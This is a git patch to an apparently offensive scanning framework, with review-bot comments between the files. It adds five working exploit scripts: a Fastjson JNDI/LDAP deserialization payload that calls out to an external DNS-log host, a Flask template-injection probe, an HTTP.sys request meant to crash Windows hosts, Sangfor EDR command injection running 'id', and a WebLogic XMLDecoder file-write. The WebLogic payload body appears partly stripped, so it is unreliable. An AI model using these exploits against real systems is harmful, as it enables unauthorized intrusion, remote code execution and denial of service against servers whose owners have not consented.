From 53a7640bd80549412879e3f99ad9d7aa7b07cdfa Mon Sep 17 00:00:00 2001
From: openx-org
Date: Fri, 25 Mar 2022 18:08:13 +0800
Subject: [PATCH] 2.23.9

---
 README.md | 7 +-
 poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py | 87 ++++++++++++++
 poc/Flask_Ssti_CVE-2017-12636/poc.py | 59 ++++++++++
 poc/MicroSoftRCE_CVE_2022_21907/poc.py | 109 ++++++++++++++++++
 poc/SANGFOR_深信服RCE_2020_EDR/poc.py | 72 ++++++++++++
 poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py | 85 ++++++++++++++
 6 files changed, 418 insertions(+), 1 deletion(-)
 create mode 100644 poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py
 create mode 100644 poc/Flask_Ssti_CVE-2017-12636/poc.py
 create mode 100644 poc/MicroSoftRCE_CVE_2022_21907/poc.py
 create mode 100644 poc/SANGFOR_深信服RCE_2020_EDR/poc.py
 create mode 100644 poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py

diff --git a/README.md b/README.md
index c55a91f..51f7d2f 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
 [![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/)
 [![License](https://img.shields.io/badge/license-GPLv3-brown.svg)](https://github.com/openx-org/BLEN/blob/main/LICENSE)
-[![POC_NUM](https://img.shields.io/badge/poc_num-157-orange.svg)](#PocSupport)
+[![POC_NUM](https://img.shields.io/badge/poc_num-162-orange.svg)](#PocSupport)
 ![GitHub Repo stars](https://img.shields.io/github/stars/openx-org/BLEN?color=gree)
 ![GitHub forks](https://img.shields.io/github/forks/openx-org/BLEN?color=blue)
@@ -179,6 +179,9 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 |Apache Solr|Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)|``poc/Apache_Solr/CVE_2019_17558/poc.py``|
 ||Apache Solr 任意文件读取漏洞|``poc/Apache_Solr/File_Read/poc.py``|
 ||Apache Solr 远程命令执行 Log4j|``poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py``|
+|Alibaba_FastJson|Alibaba_FastJsonRCE_CVE_2017_18349|``poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py``|
+|MicroSoft|MicroSoftRCE_CVE_2022_2190|``poc\MicroSoftRCE_CVE_2022_21907\poc.py``|
+|Sangfor 深信服|深信服EDR终端检测响应平台RCE漏洞(CNVD-2020-46552)|``poc/SANGFOR_深信服/RCE_2020_EDR/poc.py``|
 |碧海威 L7|碧海威 L7 弱口令漏洞|``poc/Bithighway_碧海威/Weak_Pass_L7/poc.py``|
 |BSPHP|BSPHP 未授权访问 信息泄露漏洞|``poc/BSPHP/Info_Disclosure/poc.py``|
 |C-Lodop|C-Lodop 云打印机系统平台任意文件读取漏洞|``poc/C_Lodop/File_Read/poc.py``|
@@ -317,6 +320,8 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 ||RCE_CVE-2018-3191|``poc/Weblogic/RCE_CVE_2018_3191/poc.py``|
 ||Weblogic SSRF (CVE-2014-4210)|``poc/Weblogic/SSRF_CVE_2014_4210/poc.py``|
 ||Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)|``poc/Weblogic/UnAuth_RCE_CVE_2020_14882/poc.py``|
+||Weblogic XMLDecoder反序列化漏洞(CVE-2017-3506)|``poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py``|
+|Flask_Ssti|Flask_Ssti_CVE-2017-12636|``poc\Flask_Ssti_CVE-2017-12636\poc.py``|
 |用友NC|用友NC6.5 BeanShell RCE|``poc/Yonyou_用友NC/RCE_BeanShell_CNVD_2021_30167/poc.py``|
 ||用友ERP-NC 目录遍历漏洞|``poc/Yonyou_用友NC/Dir_List_ERP/poc.py``|
 ||用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923|``poc/Yonyou_用友NC/Sqli_CNNVD_201610_923/poc.py``|
diff --git a/poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py b/poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py
new file mode 100644
index 0000000..a608be5
--- /dev/null
+++ b/poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py
@@ -0,0 +1,87 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua,get_ceye_dns,verify_ceye_dns
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "hansi", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ 组件类的漏洞并不适合直接拿到BLEN里批量扫,失败是可以预见的事情,笔者建议的是在渗透过程中将可疑的url拿来测试
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "Fastjson 反序列化远程代码执行漏洞(CVE-2017-18349)", # 漏洞名称
+ "VulnID" : "CVE-2017-18349", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "Fastjson", # 漏洞应用名称
+ "AppVersion" : "Fastjson <= 1.2.24", # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ app="Fastjson"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "" # url自己按需调整
+
+ success,dns_flag = get_ceye_dns()
+ if success == False:
+ return [False,dns_flag]
+
+ data = '''
+ {
+ "b": {
+ "@type": "com.sun.rowset.JdbcRowSetImpl",
+ "dataSourceName": "ldap://%s/",
+ "autoCommit": true
+ }
+ }
+ ''' % (dns_flag)
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ # "Content-Type": "application/json",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+
+ flager = verify_ceye_dns(dns_flag)
+ if flager == True:
+ vuln = [True,dns_flag]
+ elif flager == False:
+ vuln = [False,dns_flag]
+ else:
+ vuln = [False,flager]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def 
_attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/Flask_Ssti_CVE-2017-12636/poc.py b/poc/Flask_Ssti_CVE-2017-12636/poc.py
new file mode 100644
index 0000000..308d66a
--- /dev/null
+++ b/poc/Flask_Ssti_CVE-2017-12636/poc.py
@@ -0,0 +1,59 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+# ...
+import urllib3
+urllib3.disable_warnings()
+_info = {
+ "author" : "", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ 该POC不具备使用价值,请忽略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "Flask 模板注入", # 漏洞名称
+ "AppName" : "Flask", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+
+ """, # 漏洞简要描述
+
+ "fofa-dork":"", # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+
+ "timeout" : 10, # 超时设定
+}
+
+def verify(host,proxy):
+ """
+ 返回vuln
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = url_handle(host) + "/?name={{233*233}}" # url自己按需调整
+
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = proxy ,timeout = self.timeout,verify = False)
+ if req.status_code == 200 and "54289" in req.text:
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ return vuln
\ No newline at end of file
diff --git a/poc/MicroSoftRCE_CVE_2022_21907/poc.py b/poc/MicroSoftRCE_CVE_2022_21907/poc.py
new file mode 100644
index 0000000..446b9b2
--- /dev/null
+++ b/poc/MicroSoftRCE_CVE_2022_21907/poc.py
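Review bot: `self._honeypot_check(vuln[1])` near the end of `_verify` is evaluated against the wrong input: in every branch `vuln[1]` is the DNS token `dns_flag` (or the error string returned by `verify_ceye_dns`), never the HTTP reply, while `req` from the `requests.post` call is assigned and never read. If the heuristic is meant to look at the target's response, pass it explicitly, `if self._honeypot_check(req.text) == True:`; if not, drop both the check and the unused `req` binding. `except Exception as e: raise e` only adds a frame; a bare `raise` keeps the original traceback, and `if success == False:` is idiomatically `if not success:`.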
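Review bot: `verify(host, proxy)` is a module-level function, yet the `requests.get` line reads `self.timeout`, so every call raises `NameError` before any request is made; the timeout this file declares is `_info["timeout"]`, so the line should read `req = requests.get(url, headers=headers, proxies=proxy, timeout=_info["timeout"], verify=False)`. The file also does not follow the `POC(POCBase)` / `_verify` / `_attack` layout of the other four PoCs in this commit, so the framework loader presumably cannot run it, and its own `PocDesc` says it has no practical value and should be ignored. If it is a placeholder, the README row added for it (with a Windows-style backslash path) points users at dead code; either port it to `POCBase` or leave it out of the table. `except Exception as e: raise e` can be a bare `raise`.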
@@ -0,0 +1,109 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+import time
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "hansi", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-01-01", # POC创建时间
+ "UpdateDate" : "2022-01-01", # POC创建时间
+ "PocDesc" : """
+ 本POC只可实现蓝屏
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "Windows HTTP协议栈远程代码执行漏洞(CVE-2022-21907)", # 漏洞名称
+ "VulnID" : "CVE-2022-21907", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : """
+ Windows Server 2019 (Server Core installation)
+ Windows Server 2019
+ Windows 10 Version 21H2 for ARM64-based Systems
+ Windows 10 Version 21H2 for 32-bit Systems
+ Windows 11 for ARM64-based Systems
+ Windows 11 for x64-based Systems
+ Windows Server, version 20H2 (Server Core Installation)
+ Windows 10 Version 20H2 for ARM64-based Systems
+ Windows 10 Version 20H2 for 32-bit Systems
+ Windows 10 Version 20H2 for x64-based Systems
+ Windows Server 2022 (Server Core installation)
+ Windows Server 2022
+ Windows 10 Version 21H1 for 32-bit Systems
+ Windows 10 Version 21H1 for ARM64-based Systems
+ Windows 10 Version 21H1 for x64-based Systems
+ Windows 10 Version 21H2 for x64-based Systems
+ Windows 10 Version 1809 for ARM64-based Systems
+ Windows 10 Version 1809 for x64-based Systems
+ Windows 10 Version 1809 for 32-bit Systems
+ """, # 漏洞应用版本
+ "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ Microsoft Windows HTTP 协议栈(HTTP.sys)存在远程代码执行漏洞,未经身份认证的远程攻击者可通过向目标 Web 服务器发送特制的HTTP请求来利用此漏洞,
+ 从而在目标系统上执行任意代码。利用此漏洞不需要身份认证和用户交互,微软官方将其标记为蠕虫漏洞,微软建议优先修补受此漏洞影响的服务器。
+
+ 此漏洞影响启用了HTTP Trailer Support的系统,默认情况下,Windows Server 2019 和 Windows 10 版本 1809不易受到攻击。
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+ 存在漏洞:vuln = 
[True,html_source] # html_source就是页面源码
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "" # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if req.status_code == 200 :
+ poc_headers = {
+ 'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA, '
+ 'BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S, '
+ 'RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF, '
+ 'TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP, '
+ 'OOOAOAOOOAOOAOOOAOOOAOO, '
+ '****************************stupiD, *, ,'
+ }
+ try:
+ req = requests.get(url,headers = poc_headers , proxies = self.proxy ,timeout = 5,verify = False)
+ except requests.exceptions.ReadTimeout as e:
+ try:
+ time.sleep(10)
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ except requests.exceptions.ConnectionError as e:
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/SANGFOR_深信服RCE_2020_EDR/poc.py b/poc/SANGFOR_深信服RCE_2020_EDR/poc.py
new file mode 100644
index 0000000..14d33ec
--- /dev/null
+++ b/poc/SANGFOR_深信服RCE_2020_EDR/poc.py
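Review bot: The inner `try` in `_verify` handles only `requests.exceptions.ReadTimeout` from the probe request; if that request fails with `ConnectionError` or another `RequestException` instead, it escapes to the outer `except Exception as e: raise e` and the scan aborts with a traceback rather than returning a `vuln` value, so the verdict depends on which exception the transport happens to raise. The `vuln = [True,req.text]` branch also returns `req.text` from the first baseline GET, because the later assignments never completed, so the "html_source" the docstring promises is the pre-crash page. Since `PocDesc` states this PoC only produces a blue screen, `_verify` is a destructive check that `_attack` merely aliases; the `_verify` docstring should say so in plain terms, e.g. `# NOTE: destructive - a positive result means the target's HTTP stack crashed; unsuitable for batch scanning`, so operators of the framework's batch mode are not surprised. `time.sleep(10)` plus up to three requests per host compounds that cost.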
@@ -0,0 +1,72 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+import re
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : " ", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-01-01", # POC创建时间
+ "UpdateDate" : "2022-01-01", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "深信服EDR终端检测响应平台RCE漏洞(CNVD-2020-46552)", # 漏洞名称
+ "VulnID" : "CNVD-2020-46552", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ 终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/tool/log/c.php?strip_slashes=system&host=id" # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ result = re.search("uid=\d+\(.+\) gid=\d+\(.+\) groups=\d+\(.+\)",req.text.strip())
+ if result:#req.status_code == 200 and :
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py b/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py
new file mode 100644
index 0000000..48193e7
--- /dev/null
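Review bot: The `re.search` pattern in `_verify` is a plain string literal containing `\d` and `\(`, which are invalid escape sequences; CPython keeps the backslashes but emits a `DeprecationWarning` (a `SyntaxWarning` in recent releases), so the match works by accident and should be a raw string: `result = re.search(r"uid=\d+\(.+\) gid=\d+\(.+\) groups=\d+\(.+\)", req.text.strip())`. `url_handle` is imported but unused here and in the other PoCs of this commit, and `except Exception as e: raise e` can be a bare `raise`. `"author" : " "` is a lone space where the sibling files use `""`.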
+++ b/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py 
@@ -0,0 +1,85 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua,random_str
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "Weblogic XMLDecoder反序列化漏洞(CVE-2017-3506)", # 漏洞名称
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : """
+ Oracle WebLogic Server10.3.6.0.0
+ Oracle WebLogic Server12.1.3.0.0
+ Oracle WebLogic Server12.2.1.1.0
+ Oracle WebLogic Server12.2.1.2.0
+ """, # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ 2017年4月17日,国家信息安全漏洞共享平台(CNVD)公开了Weblogic反序列化远程代码执行漏洞(CNVD-C-2019-48814)。
+ 由于在反序列化处理输入信息的过程中存在缺陷,
+ 未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,利用该漏洞获取服务器权限,实现远程代码执行。
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url0 = self.target + "/wls-wsat/CoordinatorPortType" # url自己按需调整
+ str_flag = random_str()
+ filename_flag = random_str() + ".log"
+ data0 = ' servers/AdminSer' \
+ 'ver/tmp/_WL_internal/wls-wsat/54p17w/war/{REWEBSHELL}{StrFlag}'.format(REWEBSHELL=filename_flag,StrFlag = str_flag)
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Content-Type": "text/xml",
+ }
+ url1 = self.target + "/wls-wsat/" + filename_flag
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req0 = requests.post(url0,data=data0,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ req1 = requests.get(url1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if str_flag in 
req1.text:#req.status_code == 200 and :
+ vuln = [True,req1.text]
+ else:
+ vuln = [False,req1.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
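Review bot: `_verify` is not a read-only check: judging by the `{REWEBSHELL}` placeholder and the war-directory path in `data0`, the POST to `url0` appears intended to write `filename_flag` (a random `.log` name) onto the host, and nothing removes it afterwards, so every positive verification leaves a persistent artifact; the docstring should state that, and the result or log should carry `url1` so the operator can clean up. `req0` from the POST is assigned but never inspected, so a rejected POST (4xx/5xx) is only discovered indirectly when the GET of `url1` misses the flag. `"VulnID" : "oFx-2021-0001"` contradicts the field's own comment (CVE takes precedence) and the `name`, which cites CVE-2017-3506; use `"VulnID" : "CVE-2017-3506"`. In this rendering the XML inside the `data0` literal appears stripped (the hunk declares 85 lines but only 81 are visible), so the request body itself could not be reviewed.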